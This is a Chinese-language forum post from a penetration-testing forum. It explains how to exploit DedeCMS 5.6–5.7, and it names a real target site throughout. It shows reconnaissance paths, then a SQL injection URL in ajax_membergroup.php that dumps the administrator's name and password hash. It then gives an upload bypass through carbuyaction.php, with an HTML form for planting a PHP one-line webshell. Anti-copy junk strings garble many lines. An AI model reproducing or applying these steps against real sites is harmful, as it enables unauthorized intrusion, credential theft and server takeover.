中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

---

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
这站 http://www.political-security.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
8 t+ E- X% `; y. A* p' Cwww.political-security.com/data/mysql_error_trace.inc 爆后台
+ l: {6 r/ k/ u( ?# y然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
1 A6 y& U$ T# I. Q. l$ U然后写上语句
. J0 z% C: Y* G: v+ m- L# x查看管理员帐号
http://www.political-security.co ... &membergroup=@`
6 x  A) W# Q1 S( I) Y
6 b7 ]' c( H& B0 _3 A7 [9 }$ B8 \admin
5 |$ G& J' f3 K; C+ ?/ w
查看管理员密码
9 T# b4 e2 k" a! T( D" P) f" p" w7 r) Y　http://www.political-security.co ... &membergroup=@`

! k0 Y& \! q" }5 D8d29b1ef9f8c5a5af429
  C  p5 }* @! Y- L9 m) }
+ {8 [& q# }. }$ b7 E8 j* W查看管理员密码

( C7 Z; F* w3 E5 @$ T& U& _得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5
- s* i. x5 x! E- f; E
* x; V1 i, C8 b8d2
9b1ef9f8c5a5af42
; P8 _. o: x3 ?. z+ [. t- Y5 N1 Z7 F9

8 z' \: j/ j. J6 [# }- Jcmd5没解出来 只好测试第二个方法
% |  B9 `! O% Q2 ~) c  z6 W5 `

, \# M* w# l1 n3 T3 c/ T7 Q②上传漏洞：
: ~4 ^! B+ L, b# h5 D8 t
只要登陆会员中心，然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
5 d0 C; }2 h/ A4 v0 @
* S. K/ c6 r3 v2 N1 ]7 r如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm
( V" |8 I& T0 E
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
或者
+ ~! y6 l" O5 L1 v5 B5 Z3 T" c. s即可上传成功

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2